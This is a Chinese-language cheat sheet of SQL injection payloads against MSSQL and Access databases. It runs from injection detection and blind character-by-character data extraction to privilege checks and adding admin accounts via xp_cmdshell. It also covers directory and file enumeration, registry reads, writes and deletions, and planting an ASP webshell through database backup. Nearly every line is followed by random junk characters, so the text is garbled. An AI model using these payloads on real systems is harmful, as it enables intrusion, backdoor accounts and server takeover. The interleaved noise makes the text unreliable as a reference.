1.判断是否有注入;and 1=1 ;and 1=2 ) (YNNu
2.初步判断是否是mssql ;and user>0 A'#d:lOA
!S=YM<A d
3.注入参数是字符'and [查询条件] and ''=' %rrA]\C'
HF0G=U}i
4.搜索时没过滤参数的'and [查询条件] and '%25'=' JaUzu3*=
"AUSgVE+h
5.判断数据库系统 n5=U.r
p{5m5x
;and (select count(*) from sysobjects)>0 mssql t8-P'3,Q$
S46aUkW.
;and (select count(*) from msysobjects)>0 access O[VY|.MEk
T3fQ #p
(ODwdN7;
JwbZ`Z*w
6.猜数据库 ;and (select Count(*) from [数据库名])>0 yMWh#[phH
Imv#7{ndq
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 K.xABKPVc
y.lWyH9
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 |OJWQU![by
(=^KP7
9.(1)猜字段的ascii值(access) "jAd.x?X7e
bg Ux&3
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 $.vm n,:.
3q73L<f
(2)猜字段的ascii值(mssql) *|S6iSn9R!
{R ),7U8
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 k7iko{5D
@e<(o
UE
10.测试权限结构(mssql) 'yPKQ/y$x
l(NQk> w
XSC=qg$
Z$/76
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- 'TS_Am?o
iv >MIdIm
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- _;03R{e*
ZxNTuGOB:
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- 5;}W=x^$a
EQ273sdK
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- o{y}c->
K ~mUO
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- ~uc7R/3ss
qA GjR!=^
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- ]P3m=/w
74M 9z
;and 1=(select IS_MEMBER('db_owner'));-- uj6'T Sl
Sy VGm@
Wu{=QjgY
eMRH*MyD
11.添加mssql和系统的帐户 >>J3"XHX
5(H%Ia
;exec master.dbo.sp_addlogin username;-- tQ{/9bN?P
;exec master.dbo.sp_password null,username,password;-- j4owo#OB-
,*iA38d.!
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- bqE'9GI
}>hn
;exec master.dbo.xp_cmdshell 'net user username password nq{/fD(2
dO82T3T
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- LJ[zF~4#
B)Y[~4o
;exec master.dbo.xp_cmdshell 'net user username password /add';-- MOD&3>NI
l?*DGW(t{
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- %(6IaqJ[
2'@m'4-N
elR'e6Q
JjS+'A$A5
12.(1)遍历目录 y`va6 %u{
uHI(-!O
;create table dirs(paths varchar(100), id int) -!XG>Z
]B3](TH"
;insert dirs exec master.dbo.xp_dirtree 'c:\' #r9+thyC
<(KCiM=E$
;and (select top 1 paths from dirs)>0 -iiX!@
wGti|7Tu*
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) vntJe^IaFd
AU\=n,K7
*Y(59J2
Y ]([K.I=
(2)遍历目录 1w=.vj<d8
NVb}uH*i
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- Y2DL%'K^
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 tA#$q;S
*|=D 0
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 kK=VG<
:M
;}+M2Ec51
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 8@rYT5e3c
'oIE:#b
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 zufphS|
y5sH7`2+5
tL OGj?/r
Gk~aTO
13.mssql中的存储过程
=c@hE'{
\< .BN;t{
xp_regenumvalues 注册表根键, 子键 c6[m'cy
st)is4
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 0ZjT.Ep
iL;V5|(sb
xp_regread 根键,子键,键值名 ]W?cy
z}Cjk6z @
;exec xp_regread @4;'>yr(
lBfthLBa
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 \na$Sb+
uJ2ZHrJ
xp_regwrite 根键,子键, 值名, 值类型, 值 H7'42J@
\$_02:#
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 "zcAYg^U
$jMA(e`Ye0
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 ~
=u8H
4;L|Ua
xp_regdeletevalue 根键,子键,值名 Z+k) N
h A ){>B<;
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 o:#jvi84F
eF%M2:&c;
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 7"Xy8]i{z
%:~Ah6R1
)(]rUJ~+~A
<Z-Pc?F&(k
14.mssql的backup创建webshell \)dp
oSrA4g
use model fZ-"._9UyH
%$ya>0?mq
create table cmd(str image); N 8[rWJ#
X}Q4;='C-
insert into cmd(str) values (''); W_wC"?A%
\NNA"
backup database model to disk='c:\l.asp'; eA1g}ipm
~+' f[!^
\Hp!NbnF$
_9=87u0
15.mssql内置函数 `e ZDG
~a_hOKU5
;and (select @@version)>0 获得Windows的版本号 7;p/S#P:
bR7tmJ[)Z
;and user_name()='dbo' 判断当前系统的连接用户是不是sa cgG*7E
.h
<=C&Yg
;and (select user_name())>0 爆当前系统的连接用户 fcdXj_u
G
T~rr*X
;and (select db_name())>0 得到当前连接的数据库 }`L;.9
= -oP,$k
yr},pB
p^Ey6,!8]D
16.简洁的webshell S!A:/(^WB
@2"uJ6o
use model Ct `)R
O h
e^{:
create table cmd(str image); (.$$U3\
5{yg
insert into cmd(str) values (''); }$<v
Z><+4
'
backup database model to disk='g:\wwwtest\l.asp';